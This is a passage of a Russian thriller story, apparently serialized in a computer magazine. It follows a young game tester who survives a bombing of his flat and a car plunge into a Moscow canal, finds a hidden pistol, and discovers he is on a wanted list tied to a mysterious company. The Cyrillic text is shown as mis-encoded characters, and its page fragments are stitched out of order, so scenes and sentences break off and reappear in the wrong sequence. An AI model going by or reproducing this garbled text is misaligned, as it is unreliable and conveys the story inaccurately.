«Ñåé÷àñ íà ìåñòå ïðîèñøåñòâèÿ ðàáîòàåò ïîæàðíàÿ áðèãàäà. Ïîêà íåèçâåñòíî, íàõîäèëñÿ ëè â êâàðòèðå íà ìîìåíò âçðûâà ïðîæèâàþùèé â íåé æèëåö — 21-ëåòíèé ìîëîäîé ÷åëîâåê ïî èìåíè Àíäðåé ×óåâ…».Åãî èìÿ, ïðîçâó÷àâøåå ïî òåëåâèçîðà, áûëî ïîäîáíî ïîùå÷èíå. «…íî ìû íàäååìñÿ, ÷òî îí íàõîäèòñÿ â áåçîïàñíîì ìåñòå.  êàêîì-íèáóäü êàôå íà Àðáàòå, ñèäèò è åñò áëèí÷èêè ñ ñûðîì. À ñåé÷àñ íà òåëåêàíàëå «ÎÐÒ» íîâîñòè ñïîðòà».  òåëåâèçîðå ïîÿâèëàñü ñïîðòèâíàÿ çàñòàâêà, âåäóùóþ ñìåíèë ìóæ÷èíà â ñòðîãèõ î÷êàõ. Àíäðåé âåðíóëñÿ íà ñâîå ìåñòî. Ñòðàííîå ïîâåäåíèå âåäóùåé, åå äîãàäêè î òîì, ãäå îí íàõîäèòñÿ, îòîøëè íà âòîðîé ïëàí. Îíè âçîðâàëè åãî êâàðòèðó. Íî çà÷åì? Åñëè ÂÐÈ ñîáèðàëàñü åãî óáèòü, òî çà÷åì ïðèâëåêàòü ê ñåáå âíèìàíèå ïîäîáíûì îáðàçîì? Ïîñêîðåå áû ïðèøåë Æîðèê. Àíäðåé ñíîâà ïîñìîòðåë íà ÷àñû — áåç ïÿòíàäöàòè ïÿòü. — Âàø çàêàç. Ìîëîäåíüêàÿ äåâóøêà ëîâêî ïåðåñòàâèëà ñ ïîäíîñà íà ñòîë òàðåëêó ñ áëèíàìè, áîêàë ïèâà è ôèñòàøêè â ðîçåòêå.

129


— Ïðèÿòíîãî àïïåòèòà, — äîáðîäóøíî ïîæåëàëà îíà ðåäêîìó, íî ïîñòîÿííîìó êëèåíòó. Áëèí÷èêè äåéñòâèòåëüíî âûãëÿäåëè íà âñå ñòî. Ïîäæàðåííûå, ñ çîëîòèñòîé êîðî÷êîé, ïîëèòûå ñîóñîì… Àíäðåé îòðåçàë êóñî÷åê, îòïðàâèë â ðîò… è òóò æå ïîïåðõíóëñÿ, âûïëåâûâàÿ îñòàòêè íà òàðåëêó. Àïïåòèòíàÿ íà âèä åäà îêàçàëàñü íà âêóñ îòâðàòèòåëüíîé, ïðåëîé ñóáñòàíöèåé. Îí çàïèë óæàñíûé ïðèâêóñ âî ðòó ïèâîì, è ñ óæàñîì ïî÷óâñòâîâàë, ÷òî ïèâî îòäàåò ìî÷îé. Àíäðåé ñïëþíóë è âûðóãàëñÿ. Áûëî òàêîå îùóùåíèå, ÷òî öåëûé Ìèð îïîë÷èëñÿ íà íåãî. Àíäðåé óñòàëî ïîëîæèë ãîëîâó íà ñòîë è òóò æå óñëûøàë íàä ñîáîé íèçêèé ìóæñêîé ãîëîñ: — Çäðàâñòâóéòå, ÿ îò Æîðû. Ñëåäóéòå ñî ìíîé.

ïðîèçîéòè.  ãîëîâå ïðîíåñëèñü ìîìåíòû èç áîåâèêîâ, ãäå ãåðîé âûïðûãèâàåò èç àâòî çà ñåêóíäó äî ãèáåëè, íî ïîñëåäîâàòü èõ ïðèìåðó Àíäðåé íå ìîã. Ñòðàõ ïðèêîâàë åãî ê ñèäåíüþ. -Íå íàäî! — êðèêíóë îí, íî âîäèëà ñ êàìåííûì ëèöîì âåë Ìåðñ ïðÿìî ê îáðûâó. Îí äàæå íå ïûòàëñÿ êàê-òî ñàì ñïàñòèñü, è ïî âèäó íå áåñïîêîèëñÿ î ñâîåé ñóäüáå. ×åðåç ìãíîâåíèå ðàçäàëñÿ óäàð, íàñòîëüêî ñèëüíûé, ÷òî Àíäðåé ñòóêíóëñÿ ãîëîâîé îá êðûøó, íà ïàðó ñåêóíä ïîòåðÿâ ïðåäñòàâëåíèå, ãäå íàõîäèòñÿ. Ìàøèíà ðàçíåñëà áàìïåðîì øàòêóþ îãðàäó è ïîëåòåëà â âîäó. ×åðåç ëîáîâîå ñòåêëî Àíäðåé óñïåë óâèäåòü íåñóùóþñÿ íà íèõ òîëùó âîäû, ïîòîì ðàçäàëñÿ åùå îäèí ãóëêèé óäàð, è Ìåðñ ïîãðóçèëñÿ â ïó÷èíó êàíàëà.

***

— Íó è ïîìîéêà, — òèõî ïðîãîâîðèë Àíäðåé, ãëÿäÿ ÷åðåç ëîáîâîå îêíî íà äíî Ìîñêâû-ðåêè. È ðàçðàçèëñÿ õîõîòîì. Åãî äðóãà ïîõèòèëè, êâàðòèðó âçîðâàëè, çà íèì îõîòÿòñÿ ïñèõîïàòû èç ÂÐÈ, îí íàõîäèòñÿ â îäíîé ìàøèíå ñ êàêèì-òî óãîëîâíèêîì, à ñàìà ìàøèíà — íà äíå êàíàëà… è åäèíñòâåííîå, ÷òî åãî âîëíîâàëî, — ýòî ÷èñòîòà âîäû. Ïðàâäà, óãîëîâíèê ðÿäîì íå ïîäàâàë ïðèçíàêîâ æèçíè: èç åãî ãîëîâû, ëåæàâøåé íà ðóëå, òåêëà ñòðóéêà êðîâè. Ïîõîæå, âî âðåìÿ óäàðà åìó ïîâåçëî ìåíüøå. Àíäðåÿ óäèâèëî ïîëíîå îòñóòñòâèå êàêèõ-ëèáî ïðèçíàêîâ ïðîòå÷êè. Îêíà áûëè ïëîòíî çàêðûòû è íå ïðîïóñêàëè íè êàïëè. -Óìåþò æå äåëàòü, — ïðèøëà â ãîëîâó åùå îäíà ñìåøíàÿ ìûñëü. Íóæíî áûëî ðåøàòü, îñòàâàòüñÿ â ìàøèíå è æäàòü ñïàñåíèÿ èëè âûáèðàòüñÿ ñàìîìó. Íå ìîãëî òàêîãî áûòü, ÷òîáû íèêòî íå çàìåòèë Ìåðñåäåñ, ëåòÿùèé â âîäó ñ ïðè÷àëà. Íî Àíäðåé íå ïðåäñòàâëÿë, íà ñêîëüêî åìó åùå õâàòèò êèñëîðîäà. Ïîâåðõíîñòü âîäû ÷åðåç ñòåêëî êàçàëàñü ñîâñåì áëèçêî. Òðè-÷åòûðå ìåòðà, íå áîëåå. Åùå ðàç ïîñìîòðåâ íà êàìèêàäçå, ðàñïðîñòåðòîãî ðÿäîì, Àíäðåé ïðèíÿë ðåøåíèå. Ðàçóâøèñü è ïîøàðèâ ïî ïðèáîðíîé ïàíåëè, îí ñòàë êëàöàòü ðàçíûå êíîïêè, ïûòàÿñü íàéòè óïðàâëåíèå îêíàìè. Íàêîíåö ñòåêëî ðÿäîì ñ âîäèòåëåì îïóñòèëîñü, è áóðëÿùèé ïîòîê âîäû âîðâàëñÿ â ñàëîí. Àíäðåÿ áóêâàëüíî ïðèïëþùèëî íàïîðîì ê áîêîâîé äâåðè, äûõàíèå îò íåîæèäàííîñòè ïåðåõâàòèëî, íî îí óñïåë íàáðàòü â ðîò êàê ìîæíî áîëüøå âîçäóõà.  ýòîò ìîìåíò ëîáîâîå ñòåêëî òðåñíóëî è ëîïíóëî êàê ìûëüíûé ïóçûðü, îñâîáîæäàÿ òûñÿ÷è íåñóùèõñÿ ê ïîâåðõíîñòè ïóçûðåé. Êîãäà âîäîâîðîò ïðåêðàòèëñÿ, Àíäðåé îòòîëêíóëñÿ îò ñèäåíèÿ íîãàìè è, ðàáîòàÿ âñåì òåëîì, ïîïëûë ââåðõ. Ãëóáèíà îêàçàëàñü áîëüøå, ÷åì îí ïðåäïîëàãàë. Åãî ñíîâà ñêîâàë ïàíè÷åñêèé ñòðàõ, ÷òî íå óñïååò äîáðàòüñÿ äî ïîâåðõíîñòè. Ê ãîðëó ïîäñòóïèëè ïðèñòóïû óäóøüÿ. È, êîãäà Àíäðåé óæå âîò-âîò áûë ãîòîâ îòêðûòü ðîò è âïóñòèòü â ëåãêèå

Àíäðåé ñèäåë â ñàëîíå íîâåíüêîãî «Ìåðñåäåñà», ãëÿäÿ â îêíî íà ïðîíîñÿùèåñÿ ìîñêîâñêèå óëèöû. Åùå â÷åðà, äî òîãî ìîìåíòà, êàê îí ïîëó÷èë ïèñüìî ñ ïðåäëîæåíèåì ñòàòü òåñòåðîì, Ìîñêâà áûëà ñîâñåì îáû÷íîé. Çà îäèí äåíü îíà ñëîâíî ïåðåíåñëàñü â ïàðàëëåëüíóþ ðåàëüíîñòü, ãäå âñå íå òàê, êàê äîëæíî áûòü. Ñòðàííîñòè êàñàëèñü äàæå åãî ñàìîãî. Ðàçâå ñåë áû îí ïàðó äíåé íàçàä â ìàøèíó ê ýòîìó òèïó áàíäèòñêîé íàðóæíîñòè, ñ òþðåìíîé òàòóèðîâêîé íà ïëå÷å? Òèïó, êîòîðûé âåç åãî íåïîíÿòíî êóäà è êîòîðûé, ñîâåðøåííî î÷åâèäíî, íå èìåë íèêàêîãî îòíîøåíèÿ ê Æîðå. Íî â òî æå âðåìÿ, îòêóäà îí ìîã çíàòü î ìåñòå âñòðå÷è? Íå ïîä ïûòêàìè æå îíè âûâåäàëè ó Æîðèêà? Õîòÿ òåïåðü Àíäðåé óæå íè â ÷åì íå áûë óâåðåí. Âîäèòåëü ìîë÷àë, ñæèìàÿ ðóëü ãðîìàäíûìè, âîëîñàòûìè ðóêàìè. — À ïî÷åìó Æîðà ñàì íå ïðèåõàë? — íàêîíåö ñïðîñèë Àíäðåé. Ìîë÷àíèå. — Çà÷åì îí âàñ ïîñëàë? È êóäà ìû åäåì? Íîëü ýìîöèé. Àíäðåé îòâåðíóëñÿ ê îêíó. Ìàøèíà ïðîåõàëà åùå íåñêîëüêî êèëîìåòðîâ, óäàëÿÿñü îò öåíòðà. Âïåðåäè ïîêàçàëñÿ ìîñò. — Ìîëèòâû çíàåøü? — âíåçàïíî íàðóøèë ìîë÷àíèå âîäèëà. — ×òî? — Ìîëèòâû, ãîâîðþ, çíàåøü? — Íåò, — âîïðîñ íåçíàêîìöà áûë íåëåïûì è íè÷åãî õîðîøåãî íå ïðåäâåùàë. — À æàëü. Òåáå áû ñåé÷àñ ïðèãîäèëèñü. Ñ ýòèìè ñëîâàìè çåê ðåçêî äåðíóë ðóëü âëåâî, è ìàøèíà, âìåñòî òîãî ÷òîáû âûåõàòü íà ìîñò, ïîíåñëàñü ê îãîðîæåííîé ïëîùàäêå, âûñòóïàþùåé íàä êàíàëîì. Àíäðåé ñ óæàñîì îñîçíàë, ÷òî ñåé÷àñ äîëæíî

130

***

XÀÊÅÐ 01 /85/ 06


òåðïêóþ ãðÿçíóþ æèäêîñòü, åãî ãîëîâà âûíûðíóëà èç âîä êàíàëà.

***

***

Àíäðåé âûáðàëñÿ íà áåòîííûé âûñòóï è îãëÿäåëñÿ. Åäèíñòâå��íûìè ëþäüìè ïîáëèçîñòè áûëà ïîæèëàÿ ïàðà, ñ óäèâëåíèåì ãëàçåâøàÿ íà íåãî. — Ìîëîäîé ÷åëîâåê, çäåñü íåëüçÿ êóïàòüñÿ! — íàñòàâèòåëüíî ïðîèçíåñëà äàìà. — Ìîæåò, çäåñü åùå è ìî÷èòüñÿ íåëüçÿ? — îãðûçíóëñÿ Àíäðåé è, äîñòàâ ïðè÷èíäàëû, æèâîïèñíî îòëèë ïðÿìî íà ãëàçàõ îòîðîïåâøèõ ñòàðèêîâ. — Íåëþäè! — ñäàâëåííûì ãîëîñîì âîñêëèêíóë ïîæèëîé äæåíòëüìåí, óâîäÿ ñâîþ ñïóòíèöó. Àíäðåé ñíÿë ìîêðóþ ôóòáîëêó, øòàíû è, ðàçëîæèâ èõ ðÿäîì, îïóñòèëñÿ íà ëåñòíè÷íóþ ñòóïåíüêó. Âîäà â òîì ìåñòå, ãäå óòîíóëà ìàøèíà, ïåðåñòàëà ïóçûðèòüñÿ, êàê áóäòî íè÷åãî íå ïðîèçîøëî. Èíòåðåñíî, ñêîëüêî âðåìåíè îí áû æäàë ïîìîùè? Ãîä? Äâà? Ñîëíöå ïðèÿòíî ëàñêàëî òåëî, è Àíäðåé ìûñëåííî ïîáëàãîäàðèë Áîãà, ÷òî íà óëèöå ëåòî, à íå çèìà. Ïîêà ñóøèëàñü îäåæäà, îí ñèäåë, ãëÿäÿ íà âîäó, è ðàçìûøëÿë, ÷òî äåëàòü äàëüøå. Ïåðâûì äåëîì íåîáõîäèìî áûëî ïîçâîíèòü Æîðå íà ìîáèëüíèê. Äàæå åñëè îòìîðîçêè èç ÂÐÈ çàõâàòèëè äðóãà, îí õîòÿ áû ïîïûòàåòñÿ óçíàòü, ÷òî èì îò íåãî íóæíî. Êîíå÷íî, òåïåðü íóæíî äåéñòâîâàòü îñòîðîæíî. Äàâàòü ñåáÿ óáèòü âòîðîé ðàç Àíäðåþ íå õîòåëîñü. Ïîøàðèâ â êàðìàíàõ øòàíîâ, îí âûòàùèë ìîêðûå, æàëêèå íà âèä äåíüãè. Âñåãî 1800 ðóáëåé. Õîðîøî, ÷òî ïàñïîðò íå çàáûë. Áåç äåíåã åùå ìîæíî áûëî âûêàðàáêàòüñÿ, íî áåç äîêóìåíòîâ åãî â òàêîì âèäå áûñòðî çàãðàáàñòàþò. Ìîáèëüíèê, òàêæå âñå ýòî âðåìÿ íàõîäèâøèéñÿ â øòàíàõ, íå ïîäàâàë ïðèçíàêîâ æèçíè. Àíäðåé ìèíóò 5 ïûòàëñÿ ïðèâåñòè åãî â ÷óâñòâî, íî òàê íè÷åãî è íå äîáèâøèñü, ñî çëîñòüþ óäàðèë åãî îá áåòîííóþ ïëèòó. ×óäåñà ïðîäîëæàëèñü. Ïëàñòìàññîâûé êîðïóñ «Íîêèè» íå ðàçëåòåëñÿ íà òûñÿ÷ó êóñî÷êîâ, à çâîíêî îòñêî÷èë îò êàìíÿ è ïðèçåìëèëñÿ âîçëå áóãðèñòîãî áóëûæíèêà, ïîìå÷åííîãî êåì-òî êðàñíîé ìàðêîé. —Íå ïñèõóé! — ïðèêàçàë ñåáå Àíäðåé è ïîäíÿë ñ çåìëè ìîáèëêó. Íà êîðïóñå íå áûëî íè öàðàïèíû. Âáëèçè áóëûæíèê, âîçëå êîòîðîãî ïðèçåìëèëàñü «Íîêèÿ», îêàçàëñÿ áîëåå èíòåðåñíûì. Ìàðêà èìåëà ôîðìó ñòðåëû, óêàçûâàþùåé âíèç, è, ñóäÿ ïî âñåìó, áûëà îñòàâëåíà ïîìàäîé. Àíäðåé íàêëîíèëñÿ è óâèäåë ïîä êàìíåì íåáîëüøîå óãëóáëåíèå, àáñîëþòíî íåâèäèìîå ñ ðàññòîÿíèÿ. Ïðîñóíóâ òóäà ðóêó, îí íàùóïàë ÷òî-òî òâåðäîå, çàâåðíóòîå â ãàçåòó. Ýòî áûë íåáîëüøîé ñâåðòîê. —Áîìáà! — ïîäóìàë Àíäðåé, ðàçâîðà÷èâàÿ åãî. È îêàçàëñÿ ïî÷òè ïðàâ. Âíóòðè íàõîäèëèñü êëþ÷ ñ áðåëêîì îò Õîíäû è çàðÿæåííûé ïèñòîëåò.

Ñîëíöå óæå ïîòèõîíüêó íà÷èíàëî ñàäèòüñÿ çà ãîðèçîíò. Àíäðåé âñå åùå ñèäåë ó ìîñòà, ðàññìàòðèâàÿ íàõîäêó. Îí íå ðàçáèðàëñÿ â îðóæèè, íî ýòî îïðåäåëåííî áûë ïèñòîëåò íå äëÿ ðàñïóãèâàíèÿ âîðîáüåâ. Òÿæåëûé, ñ êðóïíûìè, ïðîäîëãîâàòûìè ïóëÿìè â îáîéìå. Àíäðåé óæå íå âåðèë â ñîâïàäåíèÿ. Ñóäüáà ïîäáðîñèëà åìó ýòîò ïîäàðîê íå ïðîñòî òàê, è îí ÷óâñòâîâàë, ÷òî ïèñòîëåòîì ðàíî èëè ïîçäíî âîñïîëüçóåòñÿ. Íî ïîêà íóæíî áûëî âûïîëíèòü çàïëàíèðîâàííîå. Àíäðåé íàòÿíóë åùå íå äî êîíöà âûñîõøèå øòàíû è áîñèêîì ïîøåë èñêàòü òàêñîôîí. Íèêòî èç ïðîõîæèõ íå îáðàùàë íà íåãî âíèìàíèÿ — î÷åâèäíî, â Ìîñêâå íå òàê ðåäêî êóïàþòñÿ â ÷åðíîé îò ãðÿçè ðåêå. Òàêñîôîíà íèãäå ïîáëèçîñòè âèäíî íå áûëî, çàòî Àíäðåé çàìåòèë íà ïóñòóþùåé îñòàíîâêå âûñîêîãî ïàðíÿ â ñîëíöåçàùèòíûõ î÷êàõ, óâëå÷åííî áåñåäóþùåãî ñ êåì-òî ïî ìîáèëüíîìó. Ïîäîæäàâ, ïîêà îí çàêîí÷èò, Àíäðåé ïðèáëèçèëñÿ è ïîïðîñèë: — Èçâèíèòå, âû íå îäîëæèòå íà ñåêóíäó òåëåôîí? Ìíå ñðî÷íî íóæíî ïîçâîíèòü. Ïàðåíü ñ ïîäîçðåíèåì îãëÿäåë åãî ñíèçó ââåðõ. — Õî÷åøü ñïàðàôèíèòü ìîé òåëåôîí? — ß? Äà íåò, ìíå äåéñòâèòåëüíî íóæíî. Ìîé ìîáèëüíèê ñëîìàëñÿ, à îäèí ÷åëîâåê î÷åíü æäåò ìîåãî çâîíêà. — Âàëè îòñþäà. «Ìîáèëüíèê ó íåãî ñëîìàëñÿ». Äóðàêà íàøåë? — ïðåçðèòåëüíî áðîñèë äîëãîâÿçûé. Àíäðåé óæå ñîáðàëñÿ îòõîäèòü, íî ïî÷óâñòâîâàë, êàê ïèñòîëåò, âûïèðàþùèé èç êàðìàíà, íà÷àë âûâàëèâàòüñÿ, è ñ ãðîìûõàíèåì ñâàëèëñÿ ê åãî íîãàì. Ëèöî ïàðíÿ íà îñòàíîâêå âûòÿíóëîñü. Îí ñ çàòðàâëåííûì âèäîì ñìîòðåë, êàê Àíäðåé ïîäíèìàåò îðóæèå. — 32-é êàëèáð. Ïóëÿ ñ òàêîãî ðàññòîÿíèÿ ïðîëåòàåò íàñêâîçü! — ïîïûòàëñÿ îòøóòèòüñÿ Àíäðåé, íî, ñóäÿ ïî ôèçèîíîìèè, ïàðåíü þìîðà íå ïîíÿë. Îñòîðîæíî ïîëîæèâ íà çåìëþ ñâîþ ìîáèëêó è èçâèíÿÿñü íà õîäó, îí ïîïÿòèëñÿ ê êðàþ îñòàíîâêè, à çàòåì, ðåçêî ðàçâåðíóâøèñü, êèíóëñÿ áåæàòü. — Äà ÿ ïîøóòèë, — êðèêíóë åìó âäîãîíêó Àíäðåé, íî òîò óæå íå ñëûøàë. Àíäðåé ñîîáðàçèë, ÷òî ëó÷øå óáèðàòüñÿ ïîäîáðó-ïîçäîðîâó. È, çàõâàòèâ îñòàâëåííûé ìîáèëüíèê, áûñòðûì øàãîì îòïðàâèëñÿ èñêàòü, ãäå ìåíåå ëþäíî. ×åðåç ìèíóò 10 îí äîøåë äî íåáîëüøîãî ïàðêà. Ñåâ íà ñêàìåéêó, Àíäðåé íàáðàë íîìåð Æîðû. Ïîñëûøàëèñü äëèííûå ãóäêè, à çàòåì íåçíàêîìûé æåíñêèé ãîëîñ îòâåòèë: «Àëëî?». — Çäðàâñòâóéòå. À âû êòî? — ïîèíòåðåñîâàëñÿ Àíäðåé. — Ýòî âû êòî? — âîçìóòèëàñü ìàäàì. — ß Àíäðåé. Ìíå íóæåí Æîðà.

XÀÊÅÐ 01 /85/ 06

131


— Ïî ýòîìó íîìåðó íåò íèêàêîãî Æîðû. — Ìîãó ÿ ïîãîâîðèòü ñ Îëåãîì Íèêîëàåâè÷åì? — Ìîëîäîé ÷åëîâåê, âû èçäåâàåòåñü? — Ýòî íîìåð ìîåãî äðóãà Æîðû Åðøîâà. Ìíå åãî íóæíî ñðî÷íî íàéòè. — Ýòî óæå 2 ãîäà êàê ìîé íîìåð, è íå çíàþ íèêàêîãî Æîðû, òåì áîëåå Îëåãà Íèêîëàåâè÷à. Íàáèðàéòå, ïîæàëóéñòà, ïðàâèëüíî, — â òðóáêå ðàçäàëèñü ãóäêè. Àíäðåé åùå ðàç íàáðàë çíàêîìóþ êîìáèíàöèþ öèôð, íî ñíîâà óñëûøàë òîò ñàìûé æåíñêèé ãîëîñ. Îí çíàë íîìåð ìîáèëüíîãî Æîðû íàèçóñòü è íå ìîã îøèáèòüñÿ. Çíà÷èò, âñå ýòî áûëî ïîäñòðîåíî, è ìàäàì â òåëåôîíå ðàáîòàëà íà åãî âðàãîâ. Òîëüêî ïî÷åìó îíè íå ïîïûòàëèñü óçíàòü, ãäå îí íàõîäèòñÿ? Èëè ìîæåò èì è íå íóæíî ñïðàøèâàòü? Àíäðåé âûáðîñèë ÷óæîé ìîáèëüíèê â ìóñîðíûé áàê è ïîñïåøèë óäàëèòüñÿ. Ïî ïóòè îí óâèäåë âûâåñêó «Èíòåðíåò-êàôå». Ïðèñëóøèâàÿñü ê âíóòðåííåìó ãîëîñó, Àíäðåé îòêðûë äâåðü è çàøåë âíóòðü.

*** Ó íåãî íå áûëî â Ìîñêâå äðóçåé, ê êîòîðûì îí ìîã îáðàòèòüñÿ çà ïîìîùüþ. Àíäðåé ïðàêòè÷åñêè íå âåë ñîöèàëüíîé æèçíè è ÷àùå îáùàëñÿ ñ ëþäüìè ÷åðåç Ñåòü. Íî ó íåãî îñòàâàëñÿ Èíòåðíåò, êîòîðûé íå ðàç âûðó÷àë èç òðóäíûõ ñèòóàöèé. Àíäðåé ïðîïëàòèë çà ÷àñ è, óñåâøèñü çà êîìïüþòåð, ïðèíÿëñÿ èñêàòü. Ïåðâûì äåëîì îí çàøåë íà íîâîñòíîé ñàéò, ÷òîáû óçíàòü ïîäðîáíîñòè âçðûâà. Íè÷åãî íîâîãî, âïðî÷åì, òàì íå áûëî. «Èç-çà ÷åãî ïðîèçîøåë âçðûâ, íèêòî íå çíàåò, ïîñòðàäàë ëè êòî-íèáóäü, ãäå íàõîäèòñÿ õîçÿèí êâàðòèðû — íåèçâåñòíî». Àíäðåé íàøåë ôîòîãðàôèþ ñ ìåñòà ïðîèñøåñòâèÿ. Íà ìåñòå, ãäå äîëæíî áûëî áûòü îêíî åãî êâàðòèðû, çèÿëà ÷åðíàÿ äûðà. Êîãäà Àíäðåé ââåë â google çàïðîñ î «ÂÐ Èíñàéä», ïîèñêîâèê ÿñíî äàë ïîíÿòü, ÷òî èíôîðìàöèè î íåé â Ñåòè íåò. Ñ òîé æå âåðîÿòíîñòüþ èç Èíòåðíåòà ìîãëà ïîëíîñòüþ èñ÷åçíóòü ëþáàÿ èíôà îá èãðå Doom. Êîíå÷íî, Ìåçà íå áûëà íàñòîëüêî ïîïóëÿðíà, íî íåñêîëüêî ëåò íàçàä èãðîìàíû áóðíî îáñóæäàëè îáåùàííûå âîçìîæíîñòè, äåëèëèñü âïå÷àòëåíèÿìè îò ñêðèíîâ è èíòåðâüþ. ×òî-òî äîëæíî áûëî îñòàòüñÿ, âåäü íå ìîãëà æå ñàìà ÂÐÈ óäàëèòü òåêñòû ñ ñåðâåðîâ, íàõîäÿùèõñÿ â ðàçíûõ óãîëêàõ Çåìëè. Àíäðåé ñòàë ïî ïàìÿòè ïåðåðûâàòü ñàéòû, íà êîòîðûõ êîãäà-òî ðàçìåùàëèñü èíòåðâüþ è ñâåäåíèÿ î ïðîåêòàõ ÂÐÈ. Íî âåçäå åãî âñòðå÷àëà îøèáêà: «404: Ôàéë íå íàéäåí». Îí ïîïûòàëñÿ ÷åðåç ïîðòàë arhive.org âîññòàíîâèòü áûâøèé îôèöèàëüíûé ñàéò êîìïàíèè, íî è ýòî íå ñðàáîòàëî. ×åðåç 40 ìèíóò, êîãäà Àíäðåé óæå îò÷àÿëñÿ ÷òî-ëèáî íàéòè, îí ðåøèë ïðîâåðèòü ñâîé åìåéë.  ÿùèêå áûëî òîëüêî îäíî ñîîáùåíèå îò àíîíèìíîãî ïîëüçîâàòåëÿ ñ ïîìåòêîé «Âàæíî». Âíóòðè áûëà ññûëêà. Àíäðåé íàæàë íà íåå è ïîïàë íà ñàéò Èíòåðïîëà, â ðàçäåë íàèáîëåå ðàçûñêèâàåìûõ ïðåñòóïíèêîâ. Ñ ìîíèòîðà íà íåãî, ïîìèìî íåèçâåñòíûõ ôèçèîíîìèé, ñìîòðåëî ñîáñòâåííîå ëèöî. Ïîä ôîòîãðàôèåé, ñäåëàííîé ãîä íàçàä íà âñòðå÷å þçåðîâ èç ìåñòíîé ëîêàëêè, íåèçâåñòíî êàê ïîïàâøåé ê âëàñòÿì, áûëà ïðèïèñêà: «Ðàçûñêèâàåòñÿ ïî ïîäîçðåíèþ â óáèéñòâå, îñóùåñòâëåíèè ïîäðûâà è ñîâåðøåíèè ðÿäà ýëåêòðîííûõ êðàæ â îñîáî êðóïíûõ ðàçìåðîâ». Äàëüøå øëî ïåðå÷èñëåíèå ïðèìåò, êîòîðûå äîñòàòî÷íî òî÷íî åãî îïèñûâàëè, è îáåùàííàÿ íàãðàäà çà ïîìîùü â ïîèìêå — 50 òûñÿ÷ äîëëàðîâ. ×óòü ïðàâåå êðàñîâàëàñü ôîòîãðàôèÿ Óñàìà áåí Ëàäåíà. Àíäðåé îãëÿíóëñÿ è çàìåòèë, êàê íà íåãî, î ÷åì-òî ïåðåøåïòûâàÿñü, ïîãëÿäûâàþò áàðìåí è àäìèíèñòðàòîð èíåò-êàôå. Ïåðåçàãðóçèâ êîìï, Àíäðåé âñòàë è ïîñïåøíî âûøåë íà óëèöó.

*** ×òî òåïåðü äåëàòü , Àíäðåé íå çíàë. Ðàíî èëè ïîçäíî îíè äîáåðóòñÿ äî íåãî. Åìó íåêóäà áûëî èäòè, íåêóäà áûëî ñêðûâàòüñÿ, îí äàæå íå çíàë, ñ êåì íà ñàìîì äåëå èìååò äåëî. Òî, ÷òî ÂÐÈ — íå ïðîñòî ãåéìäåâåëîïåðñêàÿ êîíòîðà, áûëî òåïåðü ïîíÿòíî. ×òî çà íåé ñêðûâàåòñÿ — îñòàâàëîñü òîëüêî äîãàäûâàòüñÿ. Âñå, ÷òî ïðîèñõîäèëî, íàïîìèíàëî ñþæåò êàêîãî-òî áîåâèêà, ãäå îí áûë ãëàâíûì ãåðîåì. Òîëüêî ìàøèíà, ðóõíóâøàÿ íà äíî êàíàëà, íå áûëà ïîõîæà íà äåêîðàöèè. Àíäðåé âñïîìíèë íåñêîëüêî ñâîèõ ëþáèìûõ ôèëüìîâ, è îáúåäèíÿëî èõ îäíî — ãëàâíûé ãåðîé íå óáåãàë îò íåïðèÿòíîñòåé. Îí øåë ïðÿìî â ëîãîâî çëîäåÿ, ÷òîáû ðàñïðàâèòüñÿ ñ íèì. ×òî æ, åìó íå÷åãî òåðÿòü. Ïî êðàéíåé ìåðå, òàê âñå áûñòðåå çàêîí÷èòñÿ. Îñòàíîâèâ æåñòîì ïðîåçæàþùåãî òàêñèñòà, Àíäðåé äîãîâîðèëñÿ î öåíå è íàçâàë àäðåñ çäàíèÿ, èç êîòîðîãî îí óòðîì áåæàë ÷òî åñòü ìî÷è. Ïðàâäà, òîãäà ó íåãî íå áûëî ïèñòîëåòà è åãî íå ïûòàëèñü óáèòü. Äà è áûëà åùå íàäåæäà ïîëó÷èòü îáúÿñíåíèÿ ó äðóãà. Âîäèòåëü, ÷òîáû ðàçâëå÷ü ïàññàæèðà, ïðèíÿëñÿ ðàññêàçûâàòü èñòîðèþ, êîòîðàÿ ïðîèçîøëà ñ íèì è äðóãîì â áàðå. — …Íó è äðóã ìíå: «Ñïîðèì, íå ïîäêàòèøü ê íåé, ñëàáî?». À ÿ åìó: «Ñïîðèì. Íà äâà ëèòðà Êëèíñêîãî».  îáùåì, çàáèëè ìû. ß ïðîáîð ïîéìàë è, çíà÷èò, èäó ê íåé. À òåëêà òàì — âàùå, êàê íà êàðòèíêå â òå-

132

ëåâèçîðå. Íó, ÿ åé: «Òèïà ïðèâåò». À îíà: «Ïðèâåò». È óëûáàåòñÿ òàê âñÿ. Áàáû… âñå îá îäíîì äóìàþò. Âîäèëà äîâîëüíî çàãîãîòàë, è Àíäðåé, ÷òîá åãî ïîääåðæàòü, íååñòåñòâåííî ãûãûêíóë. —  îáùåì, Âîâàí ïðîñïîðèë ìíå áóòûëü. Ìû ñ òîé äåâàõîé ïîòîì óåõàëè, è ÿ åå ïî ïóòè òîãî, íó òû ïîíÿë, âñÿêî-ðàçíî. — Àãà, — îäîáðèòåëüíî çàêèâàë Àíäðåé. È, ÷òîáû ïîìåíÿòü òåìó ðàçãîâîðà, ñòàë ðàññïðàøèâàòü, êàê äîëãî òîò ðàáîòàåò âîäèòåëåì. — Äà êàê ñåáÿ ïîìíþ. Ëåò 20 óæå ïîäè. Çà ýòîò ñðîê óæå ñòîëüêî âñÿêîãî ñëó÷àëîñü, ó-ó-ó. Âîäèëà ñòàë ðàññêàçûâàòü äîðîæíûå èñòîðèè, íî Àíäðåé îêóíóëñÿ â ñâîè ìûñëè, äóìàÿ î Æîðêå, ÂÐÈ, Ìåçå. Åìó õîòåëîñü âåðíóòüñÿ â âèðòóàëüíûé ìèð Ìåçû. Áåç íàäçîðà, áåç èíöèäåíòîâ, âëèÿþùèõ íà ðåàëüíóþ æèçíü. Ïðîñòî, ÷òîá óéòè îò âñåãî òîãî, ÷òî íà íåãî íàâàëèëîñü. — À ÿ åìó: «Ñïîðèì. Íà äâà ëèòðà Êëèíñêîãî».  îáùåì, çàáèëè ìû. ß ïðîáîð ïîéìàë è, çíà÷èò, èäó ê íåé. À òåëêà òàì — âàùå, êàê íà êàðòèíêå â òåëåâèçîðå. Àíäðåé îòâëåêñÿ îò ñâîèõ ìûñëåé è ñ óäèâëåíèåì ïîñìîòðåë íà âîäèòåëÿ. Òîò ïåðåñêàçûâàë ñëîâî â ñëîâî áàðíóþ èñòîðèþ, âî âðåìÿ êîòîðîé îí âûèãðàë äâà ëèòðà ïèâà. Äîéäÿ äî ìîìåíòà, êîãäà îí 